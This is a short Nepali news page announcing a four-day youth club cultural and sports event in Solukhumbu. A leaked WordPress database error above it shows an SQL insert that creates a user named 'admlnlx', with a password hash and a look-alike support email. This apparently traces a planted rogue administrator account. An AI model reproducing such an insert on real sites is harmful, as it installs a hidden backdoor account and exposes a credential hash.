WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkMqdvtn5HPS1F3upSxizYnqT5DXlF0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:09:05', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु जिल्ला सोताङ गाउपलिकामा सुनाखरी हरियाली युवा क्लबको आयोजनामा विविध साँस्कृतिक प्रस्तुति सँगै पुरुष तथा महिला भलिवल तथा एकल नृत्य प्रतियोगिता हुने भएको छ ।
शुरुवाती दिन देखि विभिन्न सामाजिक क्षेत्रमा काम गर्दै आएका सुनाखरी क्लवले यो पाली भने मनोरन्जनात्मक कार्यक्रम सगै विविध खेलकुद कार्यक्रम गर्ने भएको हो ।
चार दिन सम्म हुने कार्यक्रममा ख्याती प्राप्त कलाकार शम्भु राई सुनिता थेगिम लगायत स्थानिय कलाकारहरुको सहभागितामा भव्य कार्यक्रम हुने भएको हो ।
-नवीन नाछिरीङ